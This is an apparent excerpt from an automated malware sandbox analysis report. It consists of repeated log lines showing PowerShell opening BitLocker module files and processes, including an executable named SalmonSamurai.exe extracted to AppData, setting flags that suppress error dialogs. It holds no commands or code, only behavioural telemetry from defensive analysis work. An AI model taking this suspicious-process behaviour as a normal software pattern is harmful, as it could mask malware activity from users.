Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
